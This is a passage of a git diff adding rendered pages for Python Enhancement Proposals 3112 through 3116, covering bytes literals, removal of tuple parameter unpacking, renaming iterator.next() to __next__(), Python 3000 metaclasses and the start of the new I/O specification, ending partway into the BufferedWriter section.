+
sok.send('EXIT\r\n')  # Python 2.x
+sok.send('EXIT\r\n'.encode('ascii'))  # Python 3000 existing
+sok.send(b'EXIT\r\n')  # proposed
+
+
+
+
+

Grammar Changes

+

The proposed syntax is an extension of the existing string +syntax [1].

+

The new syntax for strings, including the new bytes literal, is:

+
stringliteral: [stringprefix] (shortstring | longstring)
+stringprefix: "b" | "r" | "br" | "B" | "R" | "BR" | "Br" | "bR"
+shortstring: "'" shortstringitem* "'" | '"' shortstringitem* '"'
+longstring: "'''" longstringitem* "'''" | '"""' longstringitem* '"""'
+shortstringitem: shortstringchar | escapeseq
+longstringitem: longstringchar | escapeseq
+shortstringchar:
+  <any source character except "\" or newline or the quote>
+longstringchar: <any source character except "\">
+escapeseq: "\" NL
+  | "\\" | "\'" | '\"'
+  | "\a" | "\b" | "\f" | "\n" | "\r" | "\t" | "\v"
+  | "\ooo" | "\xhh"
+  | "\uxxxx" | "\Uxxxxxxxx" | "\N{name}"
+
+
+

The following additional restrictions apply only to bytes literals +(stringliteral tokens with b or B in the +stringprefix):

+
    +
  • Each shortstringchar or longstringchar must be a character +between 1 and 127 inclusive, regardless of any encoding +declaration [2] in the source file.
  • +
  • The Unicode-specific escape sequences \uxxxx, +\Uxxxxxxxx, and \N{name} are unrecognized in +Python 2.x and forbidden in Python 3000.
  • +
+

Adjacent bytes literals are subject to the same concatenation rules as +adjacent string literals [3]. A bytes literal adjacent to a +string literal is an error.

+
+
+

Semantics

+

Each evaluation of a bytes literal produces a new bytes object. +The bytes in the new object are the bytes represented by the +shortstringitem or longstringitem parts of the literal, in the +same order.

+
+
+

Rationale

+

The proposed syntax provides a cleaner migration path from Python 2.x +to Python 3000 for most code involving 8-bit strings. Preserving the +old 8-bit meaning of a string literal is usually as simple as adding a +b prefix. The one exception is Python 2.x strings containing +bytes >127, which must be rewritten using escape sequences. +Transcoding a source file from one encoding to another, and fixing up +the encoding declaration, should preserve the meaning of the program. +Python 2.x non-Unicode strings violate this principle; Python 3000 +bytes literals shouldn’t.

+

A string literal with a b in the prefix is always a syntax error +in Python 2.5, so this syntax can be introduced in Python 2.6, along +with the bytes type.

+

A bytes literal produces a new object each time it is evaluated, like +list displays and unlike string literals. This is necessary because +bytes literals, like lists and unlike strings, are +mutable [4].

+
+
+

Reference Implementation

+

Thomas Wouters has checked an implementation into the Py3K branch, +r53872.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3112.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3113/index.html b/pep-3113/index.html new file mode 100644 index 00000000000..9c62e88a49a --- /dev/null +++ b/pep-3113/index.html @@ -0,0 +1,387 @@ + + + + + + + + PEP 3113 – Removal of Tuple Parameter Unpacking | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3113 – Removal of Tuple Parameter Unpacking

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Tuple parameter unpacking is the use of a tuple as a parameter in a +function signature so as to have a sequence argument automatically +unpacked. An example is:

+
def fxn(a, (b, c), d):
+    pass
+
+
+

The use of (b, c) in the signature requires that the second +argument to the function be a sequence of length two (e.g., +[42, -13]). When such a sequence is passed it is unpacked and +has its values assigned to the parameters, just as if the statement +b, c = [42, -13] had been executed in the parameter.

+

Unfortunately this feature of Python’s rich function signature +abilities, while handy in some situations, causes more issues than +they are worth. Thus this PEP proposes their removal from the +language in Python 3.0.

+
+
+

Why They Should Go

+
+

Introspection Issues

+

Python has very powerful introspection capabilities. These extend to +function signatures. There are no hidden details as to what a +function’s call signature is. In general it is fairly easy to figure +out various details about a function’s signature by viewing the +function object and various attributes on it (including the function’s +func_code attribute).

+

But there is great difficulty when it comes to tuple parameters. The +existence of a tuple parameter is denoted by its name being made of a +. and a number in the co_varnames attribute of the function’s +code object. This allows the tuple argument to be bound to a name +that only the bytecode is aware of and cannot be typed in Python +source. But this does not specify the format of the tuple: its +length, whether there are nested tuples, etc.

+

In order to get all of the details about the tuple from the function +one must analyse the bytecode of the function. This is because the +first bytecode in the function literally translates into the tuple +argument being unpacked. Assuming the tuple parameter is +named .1 and is expected to unpack to variables spam and +monty (meaning it is the tuple (spam, monty)), the first +bytecode in the function will be for the statement +spam, monty = .1. This means that to know all of the details of +the tuple parameter one must look at the initial bytecode of the +function to detect tuple unpacking for parameters formatted as +\.\d+ and deduce any and all information about the expected +argument. Bytecode analysis is how the inspect.getargspec +function is able to provide information on tuple parameters. This is +not easy to do and is burdensome on introspection tools as they must +know how Python bytecode works (an otherwise unneeded burden as all +other types of parameters do not require knowledge of Python +bytecode).

+

The difficulty of analysing bytecode not withstanding, there is +another issue with the dependency on using Python bytecode. +IronPython [3] does not use Python’s bytecode. Because it +is based on the .NET framework it instead stores MSIL [4] in +func_code.co_code attribute of the function. This fact prevents +the inspect.getargspec function from working when run under +IronPython. It is unknown whether other Python implementations are +affected but is reasonable to assume if the implementation is not just +a re-implementation of the Python virtual machine.

+
+
+

No Loss of Abilities If Removed

+

As mentioned in Introspection Issues, to handle tuple parameters +the function’s bytecode starts with the bytecode required to unpack +the argument into the proper parameter names. This means that there +is no special support required to implement tuple parameters and thus +there is no loss of abilities if they were to be removed, only a +possible convenience (which is addressed in +Why They Should (Supposedly) Stay).

+

The example function at the beginning of this PEP could easily be +rewritten as:

+
def fxn(a, b_c, d):
+    b, c = b_c
+    pass
+
+
+

and in no way lose functionality.

+
+
+

Exception To The Rule

+

When looking at the various types of parameters that a Python function +can have, one will notice that tuple parameters tend to be an +exception rather than the rule.

+

Consider PEP 3102 (keyword-only arguments) and PEP 3107 (function +annotations). Both PEPs have been accepted and +introduce new functionality within a function’s signature. And yet +for both PEPs the new feature cannot be applied to tuple parameters as +a whole. PEP 3102 has no support for tuple parameters at all (which +makes sense as there is no way to reference a tuple parameter by +name). PEP 3107 allows annotations for each item within the tuple +(e.g., (x:int, y:int)), but not the whole tuple (e.g., +(x, y):int).

+

The existence of tuple parameters also places sequence objects +separately from mapping objects in a function signature. There is no +way to pass in a mapping object (e.g., a dict) as a parameter and have +it unpack in the same fashion as a sequence does into a tuple +parameter.

+
+
+

Uninformative Error Messages

+

Consider the following function:

+
def fxn((a, b), (c, d)):
+    pass
+
+
+

If called as fxn(1, (2, 3)) one is given the error message +TypeError: unpack non-sequence. This error message in no way +tells you which tuple was not unpacked properly. There is also no +indication that this was a result that occurred because of the +arguments. Other error messages regarding arguments to functions +explicitly state its relation to the signature: +TypeError: fxn() takes exactly 2 arguments (0 given), etc.

+
+
+

Little Usage

+

While an informal poll of the handful of Python programmers I know +personally and from the PyCon 2007 sprint indicates a huge majority of +people do not know of this feature and the rest just do not use it, +some hard numbers is needed to back up the claim that the feature is +not heavily used.

+

Iterating over every line in Python’s code repository in the Lib/ +directory using the regular expression ^\s*def\s*\w+\s*\( to +detect function and method definitions there were 22,252 matches in +the trunk.

+

Tacking on .*,\s*\( to find def statements that contained a +tuple parameter, only 41 matches were found. This means that for +def statements, only 0.18% of them seem to use a tuple parameter.

+
+
+
+

Why They Should (Supposedly) Stay

+
+

Practical Use

+

In certain instances tuple parameters can be useful. A common example +is code that expects a two-item tuple that represents a Cartesian +point. While true it is nice to be able to have the unpacking of the +x and y coordinates for you, the argument is that this small amount of +practical usefulness is heavily outweighed by other issues pertaining +to tuple parameters. And as shown in +No Loss Of Abilities If Removed, their use is purely practical and +in no way provide a unique ability that cannot be handled in other +ways very easily.

+
+
+

Self-Documentation For Parameters

+

It has been argued that tuple parameters provide a way of +self-documentation for parameters that are expected to be of a certain +sequence format. Using our Cartesian point example from +Practical Use, seeing (x, y) as a parameter in a function makes +it obvious that a tuple of length two is expected as an argument for +that parameter.

+

But Python provides several other ways to document what parameters are +for. Documentation strings are meant to provide enough information +needed to explain what arguments are expected. Tuple parameters might +tell you the expected length of a sequence argument, it does not tell +you what that data will be used for. One must also read the docstring +to know what other arguments are expected if not all parameters are +tuple parameters.

+

Function annotations (which do not work with tuple parameters) can +also supply documentation. Because annotations can be of any form, +what was once a tuple parameter can be a single argument parameter +with an annotation of tuple, tuple(2), Cartesian point, +(x, y), etc. Annotations provide great flexibility for +documenting what an argument is expected to be for a parameter, +including being a sequence of a certain length.

+
+
+
+

Transition Plan

+

To transition Python 2.x code to 3.x where tuple parameters are +removed, two steps are suggested. First, the proper warning is to be +emitted when Python’s compiler comes across a tuple parameter in +Python 2.6. This will be treated like any other syntactic change that +is to occur in Python 3.0 compared to Python 2.6.

+

Second, the 2to3 refactoring tool [1] will gain a fixer +[2] for translating tuple parameters to being a single parameter +that is unpacked as the first statement in the function. The name of +the new parameter will be changed. The new parameter will then be +unpacked into the names originally used in the tuple parameter. This +means that the following function:

+
def fxn((a, (b, c))):
+    pass
+
+
+

will be translated into:

+
def fxn(a_b_c):
+    (a, (b, c)) = a_b_c
+    pass
+
+
+

As tuple parameters are used by lambdas because of the single +expression limitation, they must also be supported. This is done by +having the expected sequence argument bound to a single parameter and +then indexing on that parameter:

+
lambda (x, y): x + y
+
+
+

will be translated into:

+
lambda x_y: x_y[0] + x_y[1]
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3113.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3114/index.html b/pep-3114/index.html new file mode 100644 index 00000000000..881c045dbc4 --- /dev/null +++ b/pep-3114/index.html @@ -0,0 +1,325 @@ + + + + + + + + PEP 3114 – Renaming iterator.next() to iterator.__next__() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3114 – Renaming iterator.next() to iterator.__next__()

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The iterator protocol in Python 2.x consists of two methods: +__iter__() called on an iterable object to yield an iterator, and +next() called on an iterator object to yield the next item in the +sequence. Using a for loop to iterate over an iterable object +implicitly calls both of these methods. This PEP proposes that the +next method be renamed to __next__, consistent with all the +other protocols in Python in which a method is implicitly called as +part of a language-level protocol, and that a built-in function named +next be introduced to invoke __next__ method, consistent with +the manner in which other protocols are explicitly invoked.

+
+
+

Names With Double Underscores

+

In Python, double underscores before and after a name are used to +distinguish names that belong to the language itself. Attributes and +methods that are implicitly used or created by the interpreter employ +this naming convention; some examples are:

+
    +
  • __file__ - an attribute automatically created by the interpreter
  • +
  • __dict__ - an attribute with special meaning to the interpreter
  • +
  • __init__ - a method implicitly called by the interpreter
  • +
+

Note that this convention applies to methods such as __init__ that +are explicitly defined by the programmer, as well as attributes such as +__file__ that can only be accessed by naming them explicitly, so it +includes names that are used or created by the interpreter.

+

(Not all things that are called “protocols” are made of methods with +double-underscore names. For example, the __contains__ method has +double underscores because the language construct x in y implicitly +calls __contains__. But even though the read method is part of +the file protocol, it does not have double underscores because there is +no language construct that implicitly invokes x.read().)

+

The use of double underscores creates a separate namespace for names +that are part of the Python language definition, so that programmers +are free to create variables, attributes, and methods that start with +letters, without fear of silently colliding with names that have a +language-defined purpose. (Colliding with reserved keywords is still +a concern, but at least this will immediately yield a syntax error.)

+

The naming of the next method on iterators is an exception to +this convention. Code that nowhere contains an explicit call to a +next method can nonetheless be silently affected by the presence +of such a method. Therefore, this PEP proposes that iterators should +have a __next__ method instead of a next method (with no +change in semantics).

+
+
+

Double-Underscore Methods and Built-In Functions

+

The Python language defines several protocols that are implemented or +customized by defining methods with double-underscore names. In each +case, the protocol is provided by an internal method implemented as a +C function in the interpreter. For objects defined in Python, this +C function supports customization by implicitly invoking a Python method +with a double-underscore name (it often does a little bit of additional +work beyond just calling the Python method.)

+

Sometimes the protocol is invoked by a syntactic construct:

+
    +
  • x[y] –> internal tp_getitem –> x.__getitem__(y)
  • +
  • x + y –> internal nb_add –> x.__add__(y)
  • +
  • -x –> internal nb_negative –> x.__neg__()
  • +
+

Sometimes there is no syntactic construct, but it is still useful to be +able to explicitly invoke the protocol. For such cases Python offers a +built-in function of the same name but without the double underscores.

+
    +
  • len(x) –> internal sq_length –> x.__len__()
  • +
  • hash(x) –> internal tp_hash –> x.__hash__()
  • +
  • iter(x) –> internal tp_iter –> x.__iter__()
  • +
+

Following this pattern, the natural way to handle next is to add a +next built-in function that behaves in exactly the same fashion.

+
    +
  • next(x) –> internal tp_iternext –> x.__next__()
  • +
+

Further, it is proposed that the next built-in function accept a +sentinel value as an optional second argument, following the style of +the getattr and iter built-in functions. When called with two +arguments, next catches the StopIteration exception and returns +the sentinel value instead of propagating the exception. This creates +a nice duality between iter and next:

+
+
iter(function, sentinel) <–> next(iterator, sentinel)
+
+
+

Previous Proposals

+

This proposal is not a new idea. The idea proposed here was supported +by the BDFL on python-dev [1] and is even mentioned in the original +iterator PEP, PEP 234:

+
(In retrospect, it might have been better to go for __next__()
+and have a new built-in, next(it), which calls it.__next__().
+But alas, it's too late; this has been deployed in Python 2.2
+since December 2001.)
+
+
+
+
+

Objections

+

There have been a few objections to the addition of more built-ins. +In particular, Martin von Loewis writes [2]:

+
I dislike the introduction of more builtins unless they have a true
+generality (i.e. are likely to be needed in many programs). For this
+one, I think the normal usage of __next__ will be with a for loop, so
+I don't think one would often need an explicit next() invocation.
+
+It is also not true that most protocols are explicitly invoked through
+builtin functions. Instead, most protocols are can be explicitly invoked
+through methods in the operator module. So following tradition, it
+should be operator.next.
+
+...
+
+As an alternative, I propose that object grows a .next() method,
+which calls __next__ by default.
+
+
+
+
+

Transition Plan

+

Two additional transformations will be added to the 2to3 translation +tool [3]:

+
    +
  • Method definitions named next will be renamed to __next__.
  • +
  • Explicit calls to the next method will be replaced with calls +to the built-in next function. For example, x.next() will +become next(x).
  • +
+

Collin Winter looked into the possibility of automatically deciding +whether to perform the second transformation depending on the presence +of a module-level binding to next [4] and found that it would be +“ugly and slow”. Instead, the translation tool will emit warnings +upon detecting such a binding. Collin has proposed warnings for the +following conditions [5]:

+
    +
  • Module-level assignments to next.
  • +
  • Module-level definitions of a function named next.
  • +
  • Module-level imports of the name next.
  • +
  • Assignments to __builtin__.next.
  • +
+
+
+

Approval

+

This PEP was accepted by Guido on March 6, 2007 [6].

+
+
+

Implementation

+

A patch with the necessary changes (except the 2to3 tool) was written +by Georg Brandl and committed as revision 54910.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3114.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3115/index.html b/pep-3115/index.html new file mode 100644 index 00000000000..d0af1d970be --- /dev/null +++ b/pep-3115/index.html @@ -0,0 +1,411 @@ + + + + + + + + PEP 3115 – Metaclasses in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3115 – Metaclasses in Python 3000

+
+
Author:
+
Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
07-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+
11-Mar-2007, 14-Mar-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes changing the syntax for declaring metaclasses, +and alters the semantics for how classes with metaclasses are +constructed.

+
+
+

Rationale

+

There are two rationales for this PEP, both of which are somewhat +subtle.

+

The primary reason for changing the way metaclasses work, is that +there are a number of interesting use cases that require the +metaclass to get involved earlier in the class construction process +than is currently possible. Currently, the metaclass mechanism is +essentially a post-processing step. With the advent of class +decorators, much of these post-processing chores can be taken over +by the decorator mechanism.

+

In particular, there is an important body of use cases where it +would be useful to preserve the order in which a class members are +declared. Ordinary Python objects store their members in a +dictionary, in which ordering is unimportant, and members are +accessed strictly by name. However, Python is often used to +interface with external systems in which the members are organized +according to an implicit ordering. Examples include declaration of C +structs; COM objects; Automatic translation of Python classes into +IDL or database schemas, such as used in an ORM; and so on.

+

In such cases, it would be useful for a Python programmer to specify +such ordering directly using the declaration order of class members. +Currently, such orderings must be specified explicitly, using some +other mechanism (see the ctypes module for an example.)

+

Unfortunately, the current method for declaring a metaclass does +not allow for this, since the ordering information has already been +lost by the time the metaclass comes into play. By allowing the +metaclass to get involved in the class construction process earlier, +the new system allows the ordering or other early artifacts of +construction to be preserved and examined.

+

There proposed metaclass mechanism also supports a number of other +interesting use cases beyond preserving the ordering of declarations. +One use case is to insert symbols into the namespace of the class +body which are only valid during class construction. An example of +this might be “field constructors”, small functions that are used in +the creation of class members. Another interesting possibility is +supporting forward references, i.e. references to Python +symbols that are declared further down in the class body.

+

The other, weaker, rationale is purely cosmetic: The current method +for specifying a metaclass is by assignment to the special variable +__metaclass__, which is considered by some to be aesthetically less +than ideal. Others disagree strongly with that opinion. This PEP +will not address this issue, other than to note it, since aesthetic +debates cannot be resolved via logical proofs.

+
+
+

Specification

+

In the new model, the syntax for specifying a metaclass is via a +keyword argument in the list of base classes:

+
class Foo(base1, base2, metaclass=mymeta):
+    ...
+
+
+

Additional keywords will also be allowed here, and will be passed to +the metaclass, as in the following example:

+
class Foo(base1, base2, metaclass=mymeta, private=True):
+    ...
+
+
+

Note that this PEP makes no attempt to define what these other +keywords might be - that is up to metaclass implementors to +determine.

+

More generally, the parameter list passed to a class definition will +now support all of the features of a function call, meaning that you +can now use *args and **kwargs-style arguments in the class base +list:

+
class Foo(*bases, **kwds):
+    ...
+
+
+
+
+

Invoking the Metaclass

+

In the current metaclass system, the metaclass object can be any +callable type. This does not change, however in order to fully +exploit all of the new features the metaclass will need to have an +extra attribute which is used during class pre-construction.

+

This attribute is named __prepare__, which is invoked as a function +before the evaluation of the class body. The __prepare__ function +takes two positional arguments, and an arbitrary number of keyword +arguments. The two positional arguments are:

+ + + + + + + + + +
namethe name of the class being created.
basesthe list of base classes.
+

The interpreter always tests for the existence of __prepare__ before +calling it; If it is not present, then a regular dictionary is used, +as illustrated in the following Python snippet.

+
def prepare_class(name, *bases, metaclass=None, **kwargs):
+    if metaclass is None:
+        metaclass = compute_default_metaclass(bases)
+    prepare = getattr(metaclass, '__prepare__', None)
+    if prepare is not None:
+        return prepare(name, bases, **kwargs)
+    else:
+        return dict()
+
+
+

The example above illustrates how the arguments to ‘class’ are +interpreted. The class name is the first argument, followed by +an arbitrary length list of base classes. After the base classes, +there may be one or more keyword arguments, one of which can be +metaclass. Note that the metaclass argument is not included +in kwargs, since it is filtered out by the normal parameter +assignment algorithm. (Note also that metaclass is a +keyword-only argument as per PEP 3102.)

+

Even though __prepare__ is not required, the default metaclass +(‘type’) implements it, for the convenience of subclasses calling +it via super().

+

__prepare__ returns a dictionary-like object which is used to store +the class member definitions during evaluation of the class body. +In other words, the class body is evaluated as a function block +(just like it is now), except that the local variables dictionary +is replaced by the dictionary returned from __prepare__. This +dictionary object can be a regular dictionary or a custom mapping +type.

+

This dictionary-like object is not required to support the full +dictionary interface. A dictionary which supports a limited set of +dictionary operations will restrict what kinds of actions can occur +during evaluation of the class body. A minimal implementation might +only support adding and retrieving values from the dictionary - most +class bodies will do no more than that during evaluation. For some +classes, it may be desirable to support deletion as well. Many +metaclasses will need to make a copy of this dictionary afterwards, +so iteration or other means for reading out the dictionary contents +may also be useful.

+

The __prepare__ method will most often be implemented as a class +method rather than an instance method because it is called before +the metaclass instance (i.e. the class itself) is created.

+

Once the class body has finished evaluating, the metaclass will be +called (as a callable) with the class dictionary, which is no +different from the current metaclass mechanism.

+

Typically, a metaclass will create a custom dictionary - either a +subclass of dict, or a wrapper around it - that will contain +additional properties that are set either before or during the +evaluation of the class body. Then in the second phase, the +metaclass can use these additional properties to further customize +the class.

+

An example would be a metaclass that uses information about the +ordering of member declarations to create a C struct. The metaclass +would provide a custom dictionary that simply keeps a record of the +order of insertions. This does not need to be a full ‘ordered dict’ +implementation, but rather just a Python list of (key,value) pairs +that is appended to for each insertion.

+

Note that in such a case, the metaclass would be required to deal +with the possibility of duplicate keys, but in most cases that is +trivial. The metaclass can use the first declaration, the last, +combine them in some fashion, or simply throw an exception. It’s up +to the metaclass to decide how it wants to handle that case.

+
+
+

Example

+

Here’s a simple example of a metaclass which creates a list of +the names of all class members, in the order that they were +declared:

+
# The custom dictionary
+class member_table(dict):
+    def __init__(self):
+        self.member_names = []
+
+    def __setitem__(self, key, value):
+        # if the key is not already defined, add to the
+        # list of keys.
+        if key not in self:
+            self.member_names.append(key)
+
+        # Call superclass
+        dict.__setitem__(self, key, value)
+
+# The metaclass
+class OrderedClass(type):
+
+    # The prepare function
+    @classmethod
+    def __prepare__(metacls, name, bases): # No keywords in this case
+        return member_table()
+
+    # The metaclass invocation
+    def __new__(cls, name, bases, classdict):
+        # Note that we replace the classdict with a regular
+        # dict before passing it to the superclass, so that we
+        # don't continue to record member names after the class
+        # has been created.
+        result = type.__new__(cls, name, bases, dict(classdict))
+        result.member_names = classdict.member_names
+        return result
+
+class MyClass(metaclass=OrderedClass):
+    # method1 goes in array element 0
+    def method1(self):
+        pass
+
+    # method2 goes in array element 1
+    def method2(self):
+        pass
+
+
+
+
+

Sample Implementation

+

Guido van Rossum has created a patch which implements the new +functionality: https://bugs.python.org/issue1681101

+
+
+

Alternate Proposals

+

Josiah Carlson proposed using the name ‘type’ instead of +‘metaclass’, on the theory that what is really being specified is +the type of the type. While this is technically correct, it is also +confusing from the point of view of a programmer creating a new +class. From the application programmer’s point of view, the ‘type’ +that they are interested in is the class that they are writing; the +type of that type is the metaclass.

+

There were some objections in the discussion to the ‘two-phase’ +creation process, where the metaclass is invoked twice, once to +create the class dictionary and once to ‘finish’ the class. Some +people felt that these two phases should be completely separate, in +that there ought to be separate syntax for specifying the custom +dict as for specifying the metaclass. However, in most cases, the +two will be intimately tied together, and the metaclass will most +likely have an intimate knowledge of the internal details of the +class dict. Requiring the programmer to insure that the correct dict +type and the correct metaclass type are used together creates an +additional and unneeded burden on the programmer.

+

Another good suggestion was to simply use an ordered dict for all +classes, and skip the whole ‘custom dict’ mechanism. This was based +on the observation that most use cases for a custom dict were for +the purposes of preserving order information. However, this idea has +several drawbacks, first because it means that an ordered dict +implementation would have to be added to the set of built-in types +in Python, and second because it would impose a slight speed (and +complexity) penalty on all class declarations. Later, several people +came up with ideas for use cases for custom dictionaries other +than preserving field orderings, so this idea was dropped.

+
+
+

Backwards Compatibility

+

It would be possible to leave the existing __metaclass__ syntax in +place. Alternatively, it would not be too difficult to modify the +syntax rules of the Py3K translation tool to convert from the old to +the new syntax.

+
+
+

References

+

[1] [Python-3000] Metaclasses in Py3K (original proposal) + https://mail.python.org/pipermail/python-3000/2006-December/005030.html

+

[2] [Python-3000] Metaclasses in Py3K (Guido’s suggested syntax) + https://mail.python.org/pipermail/python-3000/2006-December/005033.html

+

[3] [Python-3000] Metaclasses in Py3K (Objections to two-phase init) + https://mail.python.org/pipermail/python-3000/2006-December/005108.html

+

[4] [Python-3000] Metaclasses in Py3K (Always use an ordered dict) + https://mail.python.org/pipermail/python-3000/2006-December/005118.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3115.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3116/index.html b/pep-3116/index.html new file mode 100644 index 00000000000..5ce98c01186 --- /dev/null +++ b/pep-3116/index.html @@ -0,0 +1,588 @@ + + + + + + + + PEP 3116 – New I/O | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3116 – New I/O

+
+
Author:
+
Daniel Stutzbach <daniel at stutzbachenterprises.com>, +Guido van Rossum <guido at python.org>, +Mike Verdone <mike.verdone at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Feb-2007
+
Python-Version:
+
3.0
+
Post-History:
+
26-Feb-2007
+
+
+
+
Table of Contents +
+
+

Rationale and Goals

+

Python allows for a variety of stream-like (a.k.a. file-like) objects +that can be used via read() and write() calls. Anything that +provides read() and write() is stream-like. However, more +exotic and extremely useful functions like readline() or +seek() may or may not be available on every stream-like object. +Python needs a specification for basic byte-based I/O streams to which +we can add buffering and text-handling features.

+

Once we have a defined raw byte-based I/O interface, we can add +buffering and text handling layers on top of any byte-based I/O class. +The same buffering and text handling logic can be used for files, +sockets, byte arrays, or custom I/O classes developed by Python +programmers. Developing a standard definition of a stream lets us +separate stream-based operations like read() and write() from +implementation specific operations like fileno() and isatty(). +It encourages programmers to write code that uses streams as streams +and not require that all streams support file-specific or +socket-specific operations.

+

The new I/O spec is intended to be similar to the Java I/O libraries, +but generally less confusing. Programmers who don’t want to muck +about in the new I/O world can expect that the open() factory +method will produce an object backwards-compatible with old-style file +objects.

+
+
+

Specification

+

The Python I/O Library will consist of three layers: a raw I/O layer, +a buffered I/O layer, and a text I/O layer. Each layer is defined by +an abstract base class, which may have multiple implementations. The +raw I/O and buffered I/O layers deal with units of bytes, while the +text I/O layer deals with units of characters.

+
+
+

Raw I/O

+

The abstract base class for raw I/O is RawIOBase. It has several +methods which are wrappers around the appropriate operating system +calls. If one of these functions would not make sense on the object, +the implementation must raise an IOError exception. For example, if a +file is opened read-only, the .write() method will raise an +IOError. As another example, if the object represents a socket, +then .seek(), .tell(), and .truncate() will raise an +IOError. Generally, a call to one of these functions maps to +exactly one operating system call.

+
+
.read(n: int) -> bytes
+
Read up to n bytes from the object and return them. Fewer +than n bytes may be returned if the operating system call +returns fewer than n bytes. If 0 bytes are returned, this +indicates end of file. If the object is in non-blocking mode +and no bytes are available, the call returns None.
+

.readinto(b: bytes) -> int

+
+
Read up to len(b) bytes from the object and stores them in +b, returning the number of bytes read. Like .read, fewer +than len(b) bytes may be read, and 0 indicates end of file. +None is returned if a non-blocking object has no bytes +available. The length of b is never changed.
+

.write(b: bytes) -> int

+
+
Returns number of bytes written, which may be < len(b).
+

.seek(pos: int, whence: int = 0) -> int

+

.tell() -> int

+

.truncate(n: int = None) -> int

+

.close() -> None

+
+

Additionally, it defines a few other methods:

+
+
.readable() -> bool
+
Returns True if the object was opened for reading, +False otherwise. If False, .read() will raise an +IOError if called.
+

.writable() -> bool

+
+
Returns True if the object was opened for writing, +False otherwise. If False, .write() and +.truncate() will raise an IOError if called.
+

.seekable() -> bool

+
+
Returns True if the object supports random access (such as +disk files), or False if the object only supports +sequential access (such as sockets, pipes, and ttys). If +False, .seek(), .tell(), and .truncate() will +raise an IOError if called.
+

.__enter__() -> ContextManager

+
+
Context management protocol. Returns self.
+

.__exit__(...) -> None

+
+
Context management protocol. Same as .close().
+
+

If and only if a RawIOBase implementation operates on an +underlying file descriptor, it must additionally provide a +.fileno() member function. This could be defined specifically by +the implementation, or a mix-in class could be used (need to decide +about this).

+
+
.fileno() -> int
+
Returns the underlying file descriptor (an integer)
+
+

Initially, three implementations will be provided that implement the +RawIOBase interface: FileIO, SocketIO (in the socket +module), and ByteIO. Each implementation must determine whether +the object supports random access as the information provided by the +user may not be sufficient (consider open("/dev/tty", "rw") or +open("/tmp/named-pipe", "rw")). As an example, FileIO can +determine this by calling the seek() system call; if it returns an +error, the object does not support random access. Each implementation +may provided additional methods appropriate to its type. The +ByteIO object is analogous to Python 2’s cStringIO library, +but operating on the new bytes type instead of strings.

+
+
+

Buffered I/O

+

The next layer is the Buffered I/O layer which provides more efficient +access to file-like objects. The abstract base class for all Buffered +I/O implementations is BufferedIOBase, which provides similar methods +to RawIOBase:

+
+
.read(n: int = -1) -> bytes
+
Returns the next n bytes from the object. It may return +fewer than n bytes if end-of-file is reached or the object is +non-blocking. 0 bytes indicates end-of-file. This method may +make multiple calls to RawIOBase.read() to gather the bytes, +or may make no calls to RawIOBase.read() if all of the needed +bytes are already buffered.
+

.readinto(b: bytes) -> int

+

.write(b: bytes) -> int

+
+
Write b bytes to the buffer. The bytes are not guaranteed to +be written to the Raw I/O object immediately; they may be +buffered. Returns len(b).
+

.seek(pos: int, whence: int = 0) -> int

+

.tell() -> int

+

.truncate(pos: int = None) -> int

+

.flush() -> None

+

.close() -> None

+

.readable() -> bool

+

.writable() -> bool

+

.seekable() -> bool

+

.__enter__() -> ContextManager

+

.__exit__(...) -> None

+
+

Additionally, the abstract base class provides one member variable:

+
+
.raw
+
A reference to the underlying RawIOBase object.
+
+

The BufferedIOBase methods signatures are mostly identical to that +of RawIOBase (exceptions: write() returns None, +read()’s argument is optional), but may have different semantics. +In particular, BufferedIOBase implementations may read more data +than requested or delay writing data using buffers. For the most +part, this will be transparent to the user (unless, for example, they +open the same file through a different descriptor). Also, raw reads +may return a short read without any particular reason; buffered reads +will only return a short read if EOF is reached; and raw writes may +return a short count (even when non-blocking I/O is not enabled!), +while buffered writes will raise IOError when not all bytes could +be written or buffered.

+

There are four implementations of the BufferedIOBase abstract base +class, described below.

+
+

BufferedReader

+

The BufferedReader implementation is for sequential-access +read-only objects. Its .flush() method is a no-op.

+
+
+

BufferedWriter

+

